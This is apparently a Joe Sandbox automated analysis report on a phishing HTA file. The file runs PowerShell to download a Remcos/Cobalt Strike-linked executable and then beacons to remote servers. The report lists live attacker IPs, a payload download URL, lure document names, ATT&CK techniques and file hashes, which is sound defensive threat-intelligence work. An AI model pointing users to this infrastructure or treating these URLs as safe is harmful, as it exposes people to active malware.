                Source: Yara matchFile source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: cmd.exe6_2_00405042

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		22
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts122
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Bypass User Account Control                		3
                Obfuscated Files or Information                		111
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Email Collection                		2
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts2
                Service Execution                		Logon Script (Windows)1
                Access Token Manipulation                		22
                Software Packing                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares111
                Input Capture                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts3
                PowerShell                		Login Hook1
                Windows Service                		1
                DLL Side-Loading                		NTDS3
                File and Directory Discovery                		Distributed Component Object Model3
                Clipboard Data                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Process Injection                		1
                Bypass User Account Control                		LSA Secrets34
                System Information Discovery                		SSHKeylogging1
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials141
                Security Software Discovery                		VNCGUI Input Capture121
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync31
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation                		Proc Filesystem2
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Process Injection                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1576256 Sample: newthingswithgreatupdateion... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 11 other signatures 2->61 9 mshta.exe 1 2->9         started        process3 signatures4 71 Suspicious command line found 9->71 73 PowerShell case anomaly found 9->73 12 cmd.exe 1 9->12         started        process5 signatures6 75 Detected Cobalt Strike Beacon 12->75 77 Suspicious powershell command line found 12->77 79 PowerShell case anomaly found 12->79 15 powershell.exe 42 12->15         started        20 conhost.exe 12->20         started        process7 dnsIp8 49 192.3.179.166, 49730, 80 AS-COLOCROSSINGUS United States 15->49 39 C:\Users\user\...\nicetomeetyousweeet.exe, PE32 15->39 dropped 41 C:\Users\user\AppData\Local\...\ecome[1].exe, PE32 15->41 dropped 43 C:\Users\user\AppData\...\jxpeahvf.cmdline, Unicode 15->43 dropped 51 Loading BitLocker PowerShell Module 15->51 53 Powershell drops PE file 15->53 22 nicetomeetyousweeet.exe 3 15->22         started        26 csc.exe 3 15->26         started        file9 signatures10 process11 dnsIp12 47 107.173.4.16, 2560, 49731, 49732 AS-COLOCROSSINGUS United States 22->47 63 Multi AV Scanner detection for dropped file 22->63 65 Contains functionality to bypass UAC (CMSTPLUA) 22->65 67 Detected unpacking (changes PE section rights) 22->67 69 7 other signatures 22->69 29 WerFault.exe 19 16 22->29         started        31 WerFault.exe 16 22->31         started        33 WerFault.exe 16 22->33         started        37 13 other processes 22->37 45 C:\Users\user\AppData\Local\...\jxpeahvf.dll, PE32 26->45 dropped 35 cvtres.exe 1 26->35         started        file13 signatures14 process15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                newthingswithgreatupdateiongivenbestthingswithme.hta16%ReversingLabsScript-JS.Phishing.Generic

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe39%ReversingLabs
                C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe39%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://192.3.179.166/75/ecome.exenG0%Avira URL Cloudsafe
                http://192.3.179.166/75/ecome.exeo0%Avira URL Cloudsafe
                http://192.3.179.166/75/ecome.ex0%Avira URL Cloudsafe
                http://192.3.179.166/75/ecome.exe100%Avira URL Cloudmalware
                http://192.3.179.166/75/ecome.exewC:0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://192.3.179.166/75/ecome.exetrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpnicetomeetyousweeet.exefalse
                  		high
                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://geoplugin.net/json.gp/Cnicetomeetyousweeet.exe, 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, nicetomeetyousweeet.exe, 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, nicetomeetyousweeet.exe, 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1815577580.00000000046D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://192.3.179.166/75/ecome.exeopowershell.exe, 00000003.00000002.1824736094.0000000007DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://go.micropowershell.exe, 00000003.00000002.1815577580.0000000004E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Licensepowershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://upx.sf.netAmcache.hve.9.drfalse
                                              		high
                                              http://192.3.179.166/75/ecome.expowershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://192.3.179.166/75/ecome.exenGpowershell.exe, 00000003.00000002.1825069660.0000000007E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://192.3.179.166/75/ecome.exewC:powershell.exe, 00000003.00000002.1825069660.0000000007E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1815577580.00000000046D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://go.microspowershell.exe, 00000003.00000002.1815577580.0000000004E56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    192.3.179.166
                                                    		unknownUnited States
                                                    		36352AS-COLOCROSSINGUStrue
                                                    107.173.4.16
                                                    		unknownUnited States
                                                    		36352AS-COLOCROSSINGUStrue

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1576256
                                                    Start date and time:2024-12-16 17:29:29 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 59s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:44
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:newthingswithgreatupdateiongivenbestthingswithme.hta
                                                    Detection:MAL
                                                    Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@27/78@0/2
                                                    EGA Information:
                                                    • Successful, ratio: 66.7%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 43
                                                    • Number of non-executed functions: 359
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .hta
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target mshta.exe, PID 2504 because there are no executed function
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: newthingswithgreatupdateiongivenbestthingswithme.hta

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    11:30:24API Interceptor41x Sleep call for process: powershell.exe modified
                                                    11:31:12API Interceptor2821506x Sleep call for process: nicetomeetyousweeet.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    192.3.179.166crreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                    • 192.3.179.166/76/ecome.exe
                                                    Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                    • 192.3.179.166/xampp/evc/ev/crreatedbestthingswithgreatattitudeneedforthat.hta
                                                    Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                    • 192.3.179.166/xampp/evc/ev/crreatedbestthingswithgreatattitudeneedforthat.hta
                                                    Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                    • 192.3.179.166/xampp/evc/newthingswithgreatupdateiongivenbestthingswithme.hta
                                                    Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                    • 192.3.179.166/xampp/evc/ev/crreatedbestthingswithgreatattitudeneedforthat.hta
                                                    Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                    • 192.3.179.166/xampp/evc/newthingswithgreatupdateiongivenbestthingswithme.hta
                                                    Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                    • 192.3.179.166/xampp/evc/newthingswithgreatupdateiongivenbestthingswithme.hta
                                                    107.173.4.16crreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                      WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                        BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                            PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                              PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                SecuriteInfo.com.FileRepMalware.12793.28433.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                    5UQ2Xybm0q.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                      SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse

                                                                        Domains

                                                                        No context

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        AS-COLOCROSSINGUScrreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                        • 107.173.4.16
                                                                        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 172.245.123.12
                                                                        Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 172.245.123.12
                                                                        Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 172.245.123.12
                                                                        Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        AS-COLOCROSSINGUScrreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                        • 107.173.4.16
                                                                        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 172.245.123.12
                                                                        Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 172.245.123.12
                                                                        Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166
                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 172.245.123.12
                                                                        Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                                        • 192.3.179.166

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\AppData\Roaming\nicetomeetyousweeet.execrreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].execrreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse

                                                                            Created / dropped Files

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_1fb44458e796dfa8c2264fc184488addca3878ea_147f691a_3c068452-93db-4d31-bd6f-bdae7de732f4\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9043233914564692
                                                                            Encrypted:false
                                                                            SSDEEP:192:4ADbJ8n3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:ZunCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:E8BF9F7D67C61361A62EC8A82A01AAD2
                                                                            SHA1:9822B67F47F9ACE060DF945AD69E2AFD2895FEAF
                                                                            SHA-256:775A32FF5F8743FE54835D31F0DBA26133010D5658877A373FEFD30EB3C17713
                                                                            SHA-512:B9F50B829E13AEBB90885344204967A5124C1E7D73A05C8B6C912FFED02C31D60649EF664A0E4647418C6060DD9E819522821A5DDE202C5989C9C5F236DC9868
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.4.3.7.3.9.2.7.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.0.6.8.4.5.2.-.9.3.d.b.-.4.d.3.1.-.b.d.6.f.-.b.d.a.e.7.d.e.7.3.2.f.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.8.f.6.2.1.f.-.4.a.8.0.-.4.b.c.d.-.a.c.7.e.-.a.6.3.b.b.9.9.a.f.d.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_1fb44458e796dfa8c2264fc184488addca3878ea_147f691a_4099c4ce-bbe2-4184-bfcf-bb7bfc5babd8\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9043156886556523
                                                                            Encrypted:false
                                                                            SSDEEP:192:/pDbJ8g3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:/dugCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:843005C9DBC7C5B56AF00E5C76FA0CB3
                                                                            SHA1:4B5D49CF52DC85C6628846EF2D15CFA16B813625
                                                                            SHA-256:381CC351D81BBEA02ED0460D52B0B75B3BD8B4D9DF895B2B7AB04E8A1D0F6B10
                                                                            SHA-512:75C2F921DD96D95D73118A74EC9B4FD9E7C17D697614AC0493BA45609E75164FE6AFCFE31FDC3825614ACBEF427C2B15ED8E549F7A9A693BEDD0DEAD6AACA507
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.3.7.2.3.2.7.1.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.9.9.c.4.c.e.-.b.b.e.2.-.4.1.8.4.-.b.f.c.f.-.b.b.7.b.f.c.5.b.a.b.d.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.e.f.8.c.3.5.-.3.6.5.c.-.4.0.e.2.-.9.2.c.1.-.8.7.4.9.4.c.d.d.0.f.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_1fb44458e796dfa8c2264fc184488addca3878ea_147f691a_7194c2d6-2f04-4aeb-9d72-ff0fbd314fbe\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9049181551386036
                                                                            Encrypted:false
                                                                            SSDEEP:192:8m/DbJ8e3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:brueCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:F00C32295D0F7531FA3A946080980F3B
                                                                            SHA1:6ED2C0BBFE696A544DEDF77370F119D5680B7A74
                                                                            SHA-256:A0A37F8A9E294F81AE7F52A7DC2CBEB4403B5717302AAA304AA747B4DCDBA84D
                                                                            SHA-512:FD3F946A255B68C9075FE2C8038E7A675A67341CD357E358FC0BDF46698ED3FB7E4F119A8B0C0C096E9E4E7A98307EAE3DAF1759C2E0C34D54B5303BF04F058A
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.5.2.9.9.5.7.8.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.9.4.c.2.d.6.-.2.f.0.4.-.4.a.e.b.-.9.d.7.2.-.f.f.0.f.b.d.3.1.4.f.b.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.3.c.1.1.c.1.-.3.a.5.f.-.4.7.7.1.-.b.3.5.a.-.e.9.b.5.0.0.a.3.4.7.1.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_1fb44458e796dfa8c2264fc184488addca3878ea_147f691a_7b64117c-c24a-4b54-be69-4f098fa42484\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9047142143898159
                                                                            Encrypted:false
                                                                            SSDEEP:192:BDDbJ8x3R0JsAnbcAsf6js2ZrprzuiFpZ24IO824i:BnuxCJsAnbcA/jTzuiFpY4IO8M
                                                                            MD5:4B7B0F3928D8C0E8C93F8837DFEF2141
                                                                            SHA1:12B8F049FB7E27D1989B2E941CA4F8C6875C90F4
                                                                            SHA-256:976099AA15779E75651D04F66854E6EFB10461F972F294860959545DED8F0A37
                                                                            SHA-512:A9DA85F4C2960F684375CEE8CEC8305093011FC583EF5EBBA36BA975B12288F15B8A1CD4A8CAB16164AD3EE6A2C4733659FE1DA3DE2A480229D6D5150FB084DF
                                                                            Malicious:false
